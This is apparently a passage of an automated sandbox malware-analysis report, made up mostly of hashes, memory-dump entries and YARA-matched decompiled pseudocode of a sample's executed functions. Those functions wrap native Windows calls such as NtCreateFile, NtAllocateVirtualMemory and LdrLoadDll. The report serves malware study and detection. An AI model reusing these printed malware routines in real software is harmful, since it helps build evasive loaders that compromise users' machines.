                                                                                                                                                                • Instruction ID: 90a6876037545b063f541bd4fff10ebb854202b76b96603aea23f911d73d415c
                                                                                                                                                                • Opcode Fuzzy Hash: 5b8fc7fa07b0e06dfd336ff93cdcd0c37c02cb46b79c9b4e3ec2c439ddddc90a
                                                                                                                                                                • Instruction Fuzzy Hash: 2FE14974E05259CFCB14CFA9D980A9EFBB2BF89304F248569E409AB356D7349E41CF50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 3vyo
                                                                                                                                                                • API String ID: 0-2958435015
                                                                                                                                                                • Opcode ID: 7df03a298dade358299950de035e0f88a8702f5ed6e806897957aa9d98448440
                                                                                                                                                                • Instruction ID: c3170a0f9bd0f5ac372d346559f0e785a51990ddacfc3bb3cdb07b895d8b75f9
                                                                                                                                                                • Opcode Fuzzy Hash: 7df03a298dade358299950de035e0f88a8702f5ed6e806897957aa9d98448440
                                                                                                                                                                • Instruction Fuzzy Hash: 73D13A74E05259DFCB10CFA9D984A9DF7B2BF89304F2485A9E409AB316D7349E41CF50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &B A
                                                                                                                                                                • API String ID: 0-1130111988
                                                                                                                                                                • Opcode ID: a92e3a2636ae876ed6cc1637dc129eb9ae58589d3579c29e3d0713e379001c72
                                                                                                                                                                • Instruction ID: 9026a3978aa9b355a447133da07641768f92e372bb2304cee569d4e0673e9df2
                                                                                                                                                                • Opcode Fuzzy Hash: a92e3a2636ae876ed6cc1637dc129eb9ae58589d3579c29e3d0713e379001c72
                                                                                                                                                                • Instruction Fuzzy Hash: DA614971E05669CBDB28CF66C9407EDF7B6BBC9300F10C6AAC40DA7224E7745A868F05
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: .{6e
                                                                                                                                                                • API String ID: 0-2378793986
                                                                                                                                                                • Opcode ID: 6157a3779d0491f8b59eecf6caebff5cef9fd9ab57c6313abe51fce0e323dd34
                                                                                                                                                                • Instruction ID: 929da4b59f334936b85375fc5dd4fcfe5c1c5be3752f3a528abd1ea4002855a9
                                                                                                                                                                • Opcode Fuzzy Hash: 6157a3779d0491f8b59eecf6caebff5cef9fd9ab57c6313abe51fce0e323dd34
                                                                                                                                                                • Instruction Fuzzy Hash: 85514870E0224A8FCB14CFEAC8446EEFBF6EB88310F14D425E515A7255D738AA418FA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &B A
                                                                                                                                                                • API String ID: 0-1130111988
                                                                                                                                                                • Opcode ID: 8ede22e1e7d1a07d7993b05407633ef5e31c5baa6b95f1dad453457f39892560
                                                                                                                                                                • Instruction ID: 08659769e1a876b874cf3ab51b8dbbc95111f5193ea51238cd42a5e067716f29
                                                                                                                                                                • Opcode Fuzzy Hash: 8ede22e1e7d1a07d7993b05407633ef5e31c5baa6b95f1dad453457f39892560
                                                                                                                                                                • Instruction Fuzzy Hash: C1512770E4566ACBDB24CF25D944BD9F7B6BB89300F10C6E6C11EB2620E7745AC58F14
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 07f1bc22d1d32a5b0c429d9af65718e8d0e89af5896164654599767ce7599367
                                                                                                                                                                • Instruction ID: 566788628e8305e61f13641265ccbbd5a27a961216d8141ad3ab78382d52a9b8
                                                                                                                                                                • Opcode Fuzzy Hash: 07f1bc22d1d32a5b0c429d9af65718e8d0e89af5896164654599767ce7599367
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1b7f5dc6fd80415ce14e4b6474b999d97c914fa4bf3d700dfe051a00c80fcd1d
                                                                                                                                                                • Instruction ID: b6df42e67d61edc21793157e3812a4fc14e5659922e0bf51747c98f13926559e
                                                                                                                                                                • Opcode Fuzzy Hash: 1b7f5dc6fd80415ce14e4b6474b999d97c914fa4bf3d700dfe051a00c80fcd1d
                                                                                                                                                                • Instruction Fuzzy Hash: C0113D30D092548FDB148F75C858BEEBBF0AB4A301F24D06AD44577291CA784A89DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5696f2f5e6c7f45be2166516c19ab900922bf4ed44fb2abd69d9cf1dc21e18e0
                                                                                                                                                                • Instruction ID: e066cc0407d796f4ff9bb9beb65b9326d33fc0ae4ea00d757e8382a303aa5070
                                                                                                                                                                • Opcode Fuzzy Hash: 5696f2f5e6c7f45be2166516c19ab900922bf4ed44fb2abd69d9cf1dc21e18e0
                                                                                                                                                                • Instruction Fuzzy Hash: 29119130C05254DFCB148FA4C5587EEBBF1AB0D305F24906AD005B3390CB784A89DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b63182d6921986c70d8f6d1a0dc06941a1fe72b926536e5f31c14dacaf10f48a
                                                                                                                                                                • Instruction ID: 81241992f10b8d231db700afe229d0dbbaa4fa5762d20d2ce631e7e84c959429
                                                                                                                                                                • Opcode Fuzzy Hash: b63182d6921986c70d8f6d1a0dc06941a1fe72b926536e5f31c14dacaf10f48a
                                                                                                                                                                • Instruction Fuzzy Hash: 37119170D093559FDB11CFB5C8587EEBFF0AB4A305F2494AAD04573281CB788A88DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f032c76b8707b9540480907bc30456f3641c3f1e4c8248b31489ab7945ea45ae
                                                                                                                                                                • Instruction ID: e8da2eb88c0c89e91ccfc851909b6f109429adc50aed953852c3b8c0d76b72d0
                                                                                                                                                                • Opcode Fuzzy Hash: f032c76b8707b9540480907bc30456f3641c3f1e4c8248b31489ab7945ea45ae
                                                                                                                                                                • Instruction Fuzzy Hash: 19117330D052589FCB15CFB5C8187EEBFF0AF4A305F24916AD445B7281C7784A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: af5dfa4538532c471fff50513b0b6a8bee4f4573ca4834583228a3cb25cb796d
                                                                                                                                                                • Instruction ID: ad92ca6c2015e1f2f92488957bf9996b623c85f858c77994d3290db30be42efb
                                                                                                                                                                • Opcode Fuzzy Hash: af5dfa4538532c471fff50513b0b6a8bee4f4573ca4834583228a3cb25cb796d
                                                                                                                                                                • Instruction Fuzzy Hash: 50115E30D042188BDB15CFA5C8087EEBAF1AB4E311F24906AD405B3290C7784A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 161fc7fa8b9291a2719baa7b25d3c5a704c3ab152829d9a3a6d5472710556555
                                                                                                                                                                • Instruction ID: 4f0959c669897ff6677edcc88fbb31c9c84b119f5ded9ee83c280df8dff50e19
                                                                                                                                                                • Opcode Fuzzy Hash: 161fc7fa8b9291a2719baa7b25d3c5a704c3ab152829d9a3a6d5472710556555
                                                                                                                                                                • Instruction Fuzzy Hash: E7113030D04218CFDB14CFA5C458BEEFBF1AB4E315F24946AD405B3290CB784A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 09ac5e9bed295f9fb38450b2ade950ec42cd7dcdac134cb8e422a101be61aaf5
                                                                                                                                                                • Instruction ID: e00caee1f4f19cd04d8bd7864f159740b27ddda5bd8c79699b4583955689d38c
                                                                                                                                                                • Opcode Fuzzy Hash: 09ac5e9bed295f9fb38450b2ade950ec42cd7dcdac134cb8e422a101be61aaf5
                                                                                                                                                                • Instruction Fuzzy Hash: A9112A70D052189FDB14CFA5C8587EEFBF1AB4E315F24946AD005B3290CB788A84EB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d4aca1fa784638fa3208bc29d3e0f21e29ccc37986a56225b17b31826afce4c0
                                                                                                                                                                • Instruction ID: 1d748e42a9baf090d745cdcaabaf4204a5b017231ef9eb992b433d6f3c24f410
                                                                                                                                                                • Opcode Fuzzy Hash: d4aca1fa784638fa3208bc29d3e0f21e29ccc37986a56225b17b31826afce4c0
                                                                                                                                                                • Instruction Fuzzy Hash: A8112E30D05258DBDB14CFA5C518BEEFAF1AB4D315F15906AD009B3390CB788A84DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                                				void* _t18;
                                                                                                                                                                				void* _t27;
                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                
                                                                                                                                                                				_t13 = _a4;
                                                                                                                                                                				_t28 = _a4 + 0xc48;
                                                                                                                                                                				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                                				_t6 =  &_a32; // 0x413d42
                                                                                                                                                                				_t12 =  &_a8; // 0x413d42
                                                                                                                                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                                				return _t18;
                                                                                                                                                                			}







                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID: B=A$B=A
                                                                                                                                                                • API String ID: 2738559852-2767357659
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                                				char* _v8;
                                                                                                                                                                				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                                				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                                				char _v536;
                                                                                                                                                                				void* _t15;
                                                                                                                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                                				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                                				void* _t30;
                                                                                                                                                                				void* _t31;
                                                                                                                                                                				void* _t32;
                                                                                                                                                                
                                                                                                                                                                				_v8 =  &_v536;
                                                                                                                                                                				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                                                                                                                				_t31 = _t30 + 0xc;
                                                                                                                                                                				if(_t15 != 0) {
                                                                                                                                                                					_t17 = E0041AF60(__eflags, _v8);
                                                                                                                                                                					_t32 = _t31 + 4;
                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                						E0041B1E0( &_v12, 0);
                                                                                                                                                                						_t32 = _t32 + 8;
                                                                                                                                                                					}
                                                                                                                                                                					_t18 = E004192F0(_v8);
                                                                                                                                                                					_v16 = _t18;
                                                                                                                                                                					__eflags = _t18;
                                                                                                                                                                					if(_t18 == 0) {
                                                                                                                                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                                						return _v16;
                                                                                                                                                                					}
                                                                                                                                                                					return _t18;
                                                                                                                                                                				} else {
                                                                                                                                                                					return _t15;
                                                                                                                                                                				}
                                                                                                                                                                			}













                                                                                                                                                                APIs
                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                                				long _t21;
                                                                                                                                                                				void* _t31;
                                                                                                                                                                
                                                                                                                                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                                				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                                				return _t21;
                                                                                                                                                                			}





                                                                                                                                                                APIs
                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                				long _t14;
                                                                                                                                                                				void* _t21;
                                                                                                                                                                
                                                                                                                                                                				asm("in al, dx");
                                                                                                                                                                				_t10 = _a4;
                                                                                                                                                                				_t3 = _t10 + 0xc60; // 0xca0
                                                                                                                                                                				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                				return _t14;
                                                                                                                                                                			}





                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                			E00418392() {
                                                                                                                                                                				long _t14;
                                                                                                                                                                				void* _t21;
                                                                                                                                                                				void* _t25;
                                                                                                                                                                
                                                                                                                                                                				asm("in al, dx");
                                                                                                                                                                				_t10 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                				_t3 = _t10 + 0xc60; // 0xca0
                                                                                                                                                                				E00418DB0(_t21,  *((intOrPtr*)(_t25 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0x10)), 0, 0x30);
                                                                                                                                                                				_t14 = NtAllocateVirtualMemory( *(_t25 + 0xc),  *(_t25 + 0x10),  *(_t25 + 0x14),  *(_t25 + 0x18),  *(_t25 + 0x1c),  *(_t25 + 0x20)); // executed
                                                                                                                                                                				return _t14;
                                                                                                                                                                			}






                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                • Opcode ID: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
                                                                                                                                                                • Instruction ID: dde8207bb22d3866a8250cf747c3222e609c147421c82a7904014a687663faa0
                                                                                                                                                                • Opcode Fuzzy Hash: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
                                                                                                                                                                • Instruction Fuzzy Hash: 1AF015B2200208AFCB14DF89DC80EEB77A9AF88354F118249BA0897241C630E811CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E004182E0(intOrPtr _a4, void* _a8) {
                                                                                                                                                                				long _t8;
                                                                                                                                                                				void* _t11;
                                                                                                                                                                
                                                                                                                                                                				_t5 = _a4;
                                                                                                                                                                				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                                				_t3 = _t5 + 0xc50; // 0x409733
                                                                                                                                                                				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                                				_t8 = NtClose(_a8); // executed
                                                                                                                                                                				return _t8;
                                                                                                                                                                			}





                                                                                                                                                                APIs
                                                                                                                                                                • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                                                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
